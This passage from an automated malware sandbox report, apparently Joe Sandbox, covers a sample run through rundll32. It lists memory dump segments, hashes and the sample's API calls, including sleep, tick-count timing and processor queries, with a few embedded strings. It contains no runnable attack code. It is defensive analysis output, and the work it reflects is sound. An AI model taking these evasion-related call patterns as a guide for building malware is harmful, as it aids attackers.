                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: FileModuleName
                    • String ID:
                    • API String ID: 514040917-0
                    • Opcode ID: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                    • Instruction ID: 501e22f373f49a8995146b0ee06b89f1180c0e2900e8ccb6f530d303bba059fa
                    • Opcode Fuzzy Hash: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                    • Instruction Fuzzy Hash: 8B111532220A5098DB20EFB6C8957DA2765E7487CCF51202AFA4E47B99DF79C189C394
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Sleep.KERNEL32 ref: 0080F91E
                      • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CAC
                      • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CC5
                    • Sleep.KERNEL32 ref: 0080F98C
                    Strings
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID: .exe$0~$ClassicIE_64$Romania Knives$bucket1$bucket2$bucket3
                    • API String ID: 3472027048-4255013377
                    • Opcode ID: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                    • Instruction ID: 5d250b9ed75b9a8aaf0cfb9770c26032a61d01ab42eb7c904a683a03c819acb6
                    • Opcode Fuzzy Hash: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                    • Instruction Fuzzy Hash: B671CD76210B85D8DB60EF66D8A13D93325F78479CF809026EB4D4BB6ADF78C649C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040DFA0: GetCurrentThreadId.KERNEL32 ref: 0040DFA8
                    • GetTickCount.KERNEL32 ref: 0040D9A6
                    • GetTickCount.KERNEL32 ref: 0040D9BF
                    • GetCurrentThreadId.KERNEL32 ref: 0040D9F9
                    • GetTickCount.KERNEL32 ref: 0040DA2C
                    • GetTickCount.KERNEL32 ref: 0040DA65
                    • GetTickCount.KERNEL32 ref: 0040DA93
                    • GetCurrentThreadId.KERNEL32 ref: 0040DB03
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: CountTick$CurrentThread
                    • String ID:
                    • API String ID: 3968769311-0
                    • Opcode ID: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                    • Instruction ID: c2a83c2f389e5ad77d80a0aa6aea5129f58ee2ceaede3d7cabad914c36d9a5fa
                    • Opcode Fuzzy Hash: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                    • Instruction Fuzzy Hash: B241D776B0560189DB145EBEC94035B3A60F78C7ACB16513BEE0EE37D4CA39C8898788
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleW.KERNEL32 ref: 0040D60A
                    • GetProcAddress.KERNEL32 ref: 0040D619
                    • GetLogicalProcessorInformation.KERNEL32 ref: 0040D655
                    Strings
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AddressHandleInformationLogicalModuleProcProcessor
                    • String ID: GetLogicalProcessorInformation$kernel32.dll
                    • API String ID: 4292003513-812649623
                    • Opcode ID: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
                    • Instruction ID: cef72fbf3f936fea3f355e027997f123dbf00725f42591d7e77524adb724cd90
                    • Opcode Fuzzy Hash: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
                    • Instruction Fuzzy Hash: 6A213A72A016108DDB54EFB5D58139E3760EB0079CF11242BFA0E27B99DB7AC8C9C788
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: File$View$CloseCreateCurrentHandleMappingProcessUnmap
                    • String ID:
                    • API String ID: 3559396350-0
                    • Opcode ID: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                    • Instruction ID: 8e748d1b53e11ccef3c0eb3844b99e526bf8a27556ab0dbc5ec00e588de23727
                    • Opcode Fuzzy Hash: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                    • Instruction Fuzzy Hash: 05510576201BC0C9EB70EF36D8997DE2761E75578CF80511AEA494BB99CFB8C684C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
